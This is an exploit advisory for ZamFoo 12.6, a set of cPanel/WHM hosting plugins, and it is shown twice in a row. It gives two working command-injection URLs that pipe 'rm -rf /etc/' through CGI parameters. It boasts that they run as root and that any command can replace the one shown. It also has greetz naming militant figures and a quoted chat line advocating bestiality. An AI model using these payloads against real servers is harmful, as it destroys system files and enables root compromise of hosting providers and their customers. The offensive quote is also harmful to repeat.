# Title: Zamfoo Multiple Arbitrary Command Executions
# Author: Al-Shabaab
# Vendor Homepage: http://www.zamfoo.com/
# Version: 12.6
# Intro
The ZamFoo software suite is a series of WHM plugin modules (also known as WHM addon modules) catered towards easing the burden of web hosting providers that sell shared hosting solutions using the Cpanel and WHM hosting platform.
# Exploit Número Uno
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
# Exploit Número Dos
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
Both of these exploitz will wipe out the /etc/ dir. Replace command with anything. It all runz as root!
# Greetz
Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
# Quote from #Al-Shabaab
<hoodedcoder> Having sex with animals should be legal. I know my cat loves me and I love him; I ask where is the harm? If it wasn't consensual he would claw me and try to get away!
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Author: Al-Shabaab
# Vendor Homepage: http://www.zamfoo.com/
# Version: 12.6
# Intro
The ZamFoo software suite is a series of WHM plugin modules (also known as WHM addon modules) catered towards easing the burden of web hosting providers that sell shared hosting solutions using the Cpanel and WHM hosting platform.
# Exploit Número Uno
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
# Exploit Número Dos
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
Both of these exploitz will wipe out the /etc/ dir. Replace command with anything. It all runz as root!
# Greetz
Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
# Quote from #Al-Shabaab
<hoodedcoder> Having sex with animals should be legal. I know my cat loves me and I love him; I ask where is the harm? If it wasn't consensual he would claw me and try to get away!
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information